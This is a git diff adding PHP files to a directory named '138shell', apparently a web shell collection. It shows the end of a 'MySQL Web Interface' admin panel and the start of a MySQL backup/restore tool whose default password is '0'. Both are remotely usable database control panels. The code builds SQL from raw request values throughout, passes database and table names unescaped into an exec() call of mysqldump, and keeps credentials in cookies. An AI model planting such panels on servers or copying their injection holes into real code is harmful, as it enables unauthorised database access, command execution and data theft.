+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr> 
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Field'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Field'>\n";
+	echo "<input type=button value=Cancel onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
+		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
+
+	if( $cmd == "add" )
+		$queryStr = "ALTER TABLE $tablename ADD $name ";
+	else if( $cmd == "edit" )
+		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+	
+	if( $M != "" )
+		if( $D != "" )
+			$queryStr .= "$type($M,$D) ";
+		else
+			$queryStr .= "$type($M) ";
+	else if( $valuelist != "" ) {
+		$valuelist = stripslashes( $valuelist );
+		$queryStr .= "$type($valuelist) ";
+	} else
+		$queryStr .= "$type ";
+
+	$queryStr .= "$unsigned $zerofill $binary ";
+
+	if( $default_value != "" )
+		$queryStr .= "DEFAULT '$default_value' ";
+	
+	$queryStr .= "$not_null $auto_increment";
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	// key change
+	$keyChange = false;
+	$result = mysql_query( "SHOW KEYS FROM $tablename" );
+	$primary = "";
+	while( $row = mysql_fetch_array($result) )
+		if( $row["Key_name"] == "PRIMARY" ) {
+			if( $row[Column_name] == $name )
+				$keyChange = true;
+			else
+				$primary .= ", $row[Column_name]";
+		}
+	if( $primary_key == "PRIMARY KEY" ) {
+		$primary .= ", $name";
+		$keyChange = !$keyChange;
+	}
+	$primary = substr( $primary, 2 );
+	if( $keyChange == true ) {
+		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+	}
+
+	viewSchema();
+}
+
+function dropField() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewSchema();
+}
+
+function viewData( $queryStr ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
+
+	echo "<h1>Data in Table</h1>\n";
+	if( $tablename != "" )
+		echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	else
+		echo "<p class=location>$dbname</p>\n";
+
+	$queryStr = stripslashes( $queryStr );
+	if( $queryStr == "" ) {
+		$queryStr = "SELECT * FROM $tablename";
+		if( $orderby != "" )
+			$queryStr .= " ORDER BY $orderby";
+		echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
+		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+	}
+
+	$pResult = mysql_db_query( $dbname, $queryStr );
+	$errMsg = mysql_error();
+
+	$GLOBALS[queryStr] = $queryStr;
+
+	if( $pResult == false ) {
+		echoQueryResult();
+		return;
+	}
+	if( $pResult == 1 ) {
+		$errMsg = "Success";
+		echoQueryResult();
+		return;
+	}
+
+	echo "<hr>\n";
+
+	$row = mysql_num_rows( $pResult );
+	$col = mysql_num_fields( $pResult );
+
+	if( $row == 0 ) {
+		echo "No Data Exist!";
+		return;
+	}
+	
+	if( $rowperpage == "" ) $rowperpage = 20;
+	if( $page == "" ) $page = 0;
+	else $page--;
+	mysql_data_seek( $pResult, $page * $rowperpage );
+
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	for( $i = 0; $i < $col; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		echo "<th>";
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+		echo "</th>\n";
+	}
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $rowperpage; $i++ ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		echo "<tr>\n";
+		$key = "";
+		for( $j = 0; $j < $col; $j++ ) {
+			$data = $rowArray[$j];
+
+			$field = mysql_fetch_field( $pResult, $j );
+			if( $field->primary_key == 1 )
+				$key .= "&" . $field->name . "=" . $data;
+
+			if( strlen( $data ) > 20 )
+				$data = substr( $data, 0, 20 ) . "...";
+			$data = htmlspecialchars( $data );
+			echo "<td>\n";
+			echo "$data\n";
+			echo "</td>\n";
+		}
+
+		if( $key == "" )
+			echo "<td colspan=2>no Key</td>\n";
+		else {
+			echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+			echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+		}
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+
+	echo "<font size=2>\n";
+	echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
+	echo "<font color=green>\n";
+	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+	echo "</font>\n";
+	echo " | ";
+	if( $page > 0 ) {
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Prev</a>\n";
+	} else
+		echo "Prev";
+	echo " | ";
+	if( $page < ($row/$rowperpage)-1 ) {
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Next</a>\n";
+	} else
+		echo "Next";
+	echo " | ";
+	if( $row > $rowperpage ) {
+		echo "<input type=text size=4 name=page>\n";
+		echo "<input type=submit value='Go'>\n";
+	}
+	echo "</form>\n";
+	echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Data</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Data</h1>\n";
+		$pResult = mysql_list_fields( $dbname, $tablename );
+		$num = mysql_num_fields( $pResult );
+	
+		$key = "";
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			if( $field->primary_key == 1 )
+				if( $field->numeric == 1 )
+					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+				else
+					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+		}
+		$key = substr( $key, 0, strlen($key)-4 );
+
+		mysql_select_db( $dbname, $mysqlHandle );
+		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
+		$data = mysql_fetch_array( $pResult );
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echo "<form action='$PHP_SELF' method=post>\n";
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addData_submit>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=hidden name=action value=editData_submit>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	echo "<th>Name</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Function</th>\n";
+	echo "<th>Data</th>\n";
+	echo "</tr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		$fieldname = $field["Field"];
+		$fieldtype = $field["Type"];
+		$len = mysql_field_len( $pResultLen, $i );
+
+		echo "<tr>";
+		echo "<td>$fieldname</td>";
+		echo "<td>".$field["Type"]."</td>";
+		echo "<td>\n";
+		echo "<select name=${fieldname}_function>\n";
+		echo "<option>\n";
+		echo "<option>ASCII\n";
+		echo "<option>CHAR\n";
+		echo "<option>SOUNDEX\n";
+		echo "<option>CURDATE\n";
+		echo "<option>CURTIME\n";
+		echo "<option>FROM_DAYS\n";
+		echo "<option>FROM_UNIXTIME\n";
+		echo "<option>NOW\n";
+		echo "<option>PASSWORD\n";
+		echo "<option>PERIOD_ADD\n";
+		echo "<option>PERIOD_DIFF\n";
+		echo "<option>TO_DAYS\n";
+		echo "<option>USER\n";
+		echo "<option>WEEKDAY\n";
+		echo "<option>RAND\n";
+		echo "</select>\n";
+		echo "</td>\n";
+		$value = htmlspecialchars($data[$i]);
+		if( $cmd == "add" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
+			}
+		} else if( $cmd == "edit" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					if( $value == $str )
+						echo "<option selected>$str\n";
+					else
+						echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
+			}
+		}
+		echo "</tr>";
+	}
+	echo "</table><p>\n";
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Data'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Data'>\n";
+	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	if( $cmd == "add" )
+		$queryStr = "INSERT INTO $tablename VALUES (";
+	else if( $cmd == "edit" )
+		$queryStr = "REPLACE INTO $tablename VALUES (";
+	for( $i = 0; $i < $num-1; $i++ ) {
+		$field = mysql_fetch_field( $pResult );
+		$func = $GLOBALS[$field->name."_function"];
+		if( $func != "" )
+			$queryStr .= " $func(";
+		if( $field->numeric == 1 ) {
+			$queryStr .= $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "),";
+			else
+				$queryStr .= ",";
+		} else {
+			$queryStr .= "'" . $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "'),";
+			else
+				$queryStr .= "',";
+		}
+	}
+	$field = mysql_fetch_field( $pResult );
+	if( $field->numeric == 1 )
+		$queryStr .= $GLOBALS[$field->name] . ")";
+	else 
+		$queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function deleteData() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	$key = "";
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		if( $field->primary_key == 1 )
+			if( $field->numeric == 1 )
+				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+			else
+				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+	}
+	$key = substr( $key, 0, strlen($key)-4 );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	$queryStr =  "DELETE FROM $tablename WHERE $key";
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function dump() {
+	global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+	if( $action == "dumpTable" )
+		$filename = $tablename;
+	else
+		$filename = $dbname;
+
+	header("Content-disposition: filename=$filename.sql");
+	header("Content-type: application/octetstream");
+	header("Pragma: no-cache");
+	header("Expires: 0");
+
+	$pResult = mysql_query( "show variables" );
+	while( 1 ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		if( $rowArray[0] == "basedir" )
+			$bindir = $rowArray[1]."bin/";
+	}
+
+	exec( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" );
+}
+
+function utils() {
+	global $PHP_SELF, $command;
+	echo "<h1>Utilities</h1>\n";
+	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+		echo "<hr>\n";
+		echo "Show\n";
+		echo "<ul>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+		echo "</ul>\n";
+		echo "Flush\n";
+		echo "<ul>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+		if( $command == "flush_hosts" ) {
+			if( mysql_query( "Flush hosts" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+		if( $command == "flush_logs" ) {
+			if( mysql_query( "Flush logs" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+		if( $command == "flush_privileges" ) {
+			if( mysql_query( "Flush privileges" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+		if( $command == "flush_tables" ) {
+			if( mysql_query( "Flush tables" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+		if( $command == "flush_status" ) {
+			if( mysql_query( "Flush status" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "</ul>\n";
+	} else {
+		$queryStr = ereg_replace( "_", " ", $command );
+		$pResult = mysql_query( $queryStr );
+		if( $pResult == false ) {
+			echo "Fail";
+			return;
+		}
+		$col = mysql_num_fields( $pResult );
+
+		echo "<p class=location>$queryStr</p>\n";
+		echo "<hr>\n";
+
+		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+		echo "<tr>\n";
+		for( $i = 0; $i < $col; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			echo "<th>".$field->name."</th>\n";
+		}
+		echo "</tr>\n";
+
+		while( 1 ) {
+			$rowArray = mysql_fetch_row( $pResult );
+			if( $rowArray == false ) break;
+			echo "<tr>\n";
+			for( $j = 0; $j < $col; $j++ )
+				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+			echo "</tr>\n";
+		}
+		echo "</table>\n";
+	}
+}
+
+function header_html() {
+	global $PHP_SELF;
+	
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+	color: #11bb33;
+	font-size: small;
+}
+h1 {
+	color: #A4A260;
+}
+th {
+	background-color: #BDBE42;
+	color: #FFFFFF;
+	font-size: x-small;
+}
+td {
+	background-color: #DEDFA5;
+	font-size: x-small;
+}
+form {
+	margin-top: 0;
+	margin-bottom: 0;
+}
+a {
+	text-decoration:none;
+	color: #848200;
+	font-size:x-small;
+}
+a:link {
+}
+a:hover {
+	background-color:#EEEFD5;
+	color:#646200;
+	text-decoration:none               
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+	echo "<hr>\n";
+	echo "<font size=2>\n";
+	echo "<font color=blue>[$USERNAME]</font> - \n";
+
+	echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+	if( $tablename != "" )
+		echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
+	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+	echo "</font>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+	logon();
+else if( $action == "logon_submit" )
+	logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	dump();
+} else {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	echo "<!--";
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	echo "-->";
+
+	if( $mysqlHandle == false ) {
+		echo "<html>\n";
+		echo "<head>\n";
+		echo "<title>MySQL Web Interface</title>\n";
+		echo "</head>\n";
+		echo "<body>\n";
+		echo "<table width=100% height=100%><tr><td><center>\n";
+		echo "<h1>Wrong Password!</h1>\n";
+		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+		echo "</center></td></tr></table>\n";
+		echo "</body>\n";
+		echo "</html>\n";
+	} else {
+		header_html();
+		if( $action == "listDBs" )
+			listDatabases();
+		else if( $action == "createDB" )
+			createDatabase();
+		else if( $action == "dropDB" )
+			dropDatabase();
+		else if( $action == "listTables" )
+			listTables();
+		else if( $action == "createTable" )
+			createTable();
+		else if( $action == "dropTable" )
+			dropTable();
+		else if( $action == "viewSchema" )
+			viewSchema();
+		else if( $action == "query" )
+			viewData( $queryStr );
+		else if( $action == "addField" )
+			manageField( "add" );
+		else if( $action == "addField_submit" )
+			manageField_submit( "add" );
+		else if( $action == "editField" )
+			manageField( "edit" );
+		else if( $action == "editField_submit" )
+			manageField_submit( "edit" );
+		else if( $action == "dropField" )
+			dropField();
+		else if( $action == "viewData" )
+			viewData( "" );
+		else if( $action == "addData" )
+			manageData( "add" );
+		else if( $action == "addData_submit" )
+			manageData_submit( "add" );
+		else if( $action == "editData" )
+			manageData( "edit" );
+		else if( $action == "editData_submit" )
+			manageData_submit( "edit" );
+		else if( $action == "deleteData" )
+			deleteData();
+		else if( $action == "utils" )
+			utils();
+
+		mysql_close( $mysqlHandle);
+		footer_html();
+	}
+}
+
+?>
\ No newline at end of file
diff --git a/138shell/M/mysql_tool.php.txt b/138shell/M/mysql_tool.php.txt
new file mode 100644
index 0000000..fd057b7
--- /dev/null
+++ b/138shell/M/mysql_tool.php.txt
@@ -0,0 +1,1078 @@
+<?php
+
+/*
+ * MySQL Database Backup / Restore Tool
+ *
+ * Copyright (C) 2003 Mark Wraith. All rights reserved
+ *
+ * Graphics and layout derived from those made by Matt Mecham
+ *
+ */
+
+// If you intend to keep the script
+// on your server set this password
+
+$password = '0';
+
+
+
+error_reporting(E_ERROR | E_WARNING | E_PARSE);	
+
+new RestoreTool;
+
+class RestoreTool
+{
+    var $logged_in = 0;
+    var $maximum_time = 0;
+
+    function RestoreTool() {
+        global $HTTP_GET_VARS, $HTTP_COOKIE_VARS, $password;
+
+        $this->timestamp = time();
+
+        if (!$this->maximum_time) 
+        {
+            //set_time_limit(0);
+        	$this->maximum_time = ini_get('max_execution_time');
+        }
+
+        if ($HTTP_GET_VARS['act'] == 'login') 
+        {
+        	$this->do_login();
+        }
+        elseif ($password && $password != $HTTP_COOKIE_VARS['mysqltool']) 
+        {
+        	$this->login();        	
+        }
+        else 
+        {
+            if ($password) 
+            {
+            	$this->logged_in = 1;
+            }
+
+            switch ($HTTP_GET_VARS['act']) 
+            {
+                case 'logout':	
+                    $this->logout();
+                break;
+
+                case 'change_db':
+                    $this->read_db_details();
+                    $this->set_database('The current settings do connect however if you wish to change the current database please edit the details below:');
+                break;
+
+                case 'set_database':	
+                    $this->do_set_database();
+                break;
+
+                case 'backup':	
+                    $this->backup();
+                break;
+
+                case 'do_backup':	
+                    $this->do_backup();
+                break;
+
+                case 'restore':	
+                    $this->restore();
+                break;
+
+                case 'do_restore':
+                    $this->do_restore();
+                break;
+
+                default:
+                    
+                    $this->main();
+            }        	
+        }
+
+        if ($this->link) 
+        {
+        	mysql_close($this->link);
+        }
+
+        $this->output();
+    }
+
+    function timeout() {
+        if (!$this->maximum_time)
+        {
+        	return false;
+        }
+        elseif ((time() - $this->timestamp) > ($this->maximum_time - 5)) 
+        {
+        	return true;
+        }
+        else 
+        {
+        	return false;
+        }
+    }
+
+    function output() {
+        if ($this->logged_in) 
+        {
+        	$logout_text = '[ <a href="mysql_tool.php?act=logout">Log Out</a> ]';
+        }
+        else 
+        {
+        	$logout_text = '';
+        }
+
+        if ($this->title) 
+        {
+        	$title = $this->title;
+        }
+        else 
+        {
+        	$title = 'Backup / Restore Tool';
+        }
+
+        print '<?xml version="1.0" encoding="iso-8859-1"?>';
+        print <<<HTML
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<title>$title</title>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
+{$this->meta}
+
+<style type="text/css">
+  TABLE, TR, TD                   { font-family: Verdana,Arial; font-size: 10px; color: #333333 }
+  BODY                            { font: 10px Verdana; background-color: #FCFCFC; padding: 0; margin: 0 }
+  a:link, a:visited, a:active     { color: #000055 }
+  a:hover                         { color: #333377; text-decoration: underline }
+  FORM                            { padding: 0; margin: 0 }
+
+  .textbox                        { border: 1px solid black; padding: 1px; width: 100% }
+  .headertable                    { background-color: #FFFFFF; border: 1px solid black; padding: 2px }
+  .title                          { font-size: 10px; font-weight: bold; line-height: 150%; color: #FFFFFF; height: 26px; background-image: url(./style_images/1/tile_back.gif) }
+  .table1                         { background-color: #FFFFFF; width: 100%; align: center; border: 1px solid black }
+  .tablewrap                      { border: 1px dashed #777777; background-color: #F5F9FD; vertical-align: middle; }
+  .tdrow1                         { background-color: #EEF2F7; padding: 3px }
+  .tdrow2                         { background-color: #F5F9FD; padding: 3px }
+  .tdtop                          { font-weight: bold; height: 24px; line-height: 150%; color: #FFFFFF; background-image: url(./tile_back.gif) }
+  .note                           { margin: 10px; padding: 5px; border: 1px dashed #555555; background-color: #FFFFFF }
+</style>
+</head>
+
+<body>
+<br />
+$this->output
+<br />
+<div align="center">
+    [ <a href="mysql_tool.php">Script Index </a> ] $logout_text <br /><br />
+    <small>&copy;2003 Mark Wraith</small>
+</div>
+</body>
+</html>
+HTML;
+    }
+
+    function error($error) {
+        $this->output = <<<HTML
+    <form method="post" action="mysql_tool.php?act=login">
+      <table align="center" class="tablewrap" cellpadding="0" cellspacing="3" width="350">
+        <tr>
+          <td align="center" class="title">Error</td>
+        </tr>
+        <tr>
+          <td>
+            <table class="table1" align="center" width="100%">
+              <tr>
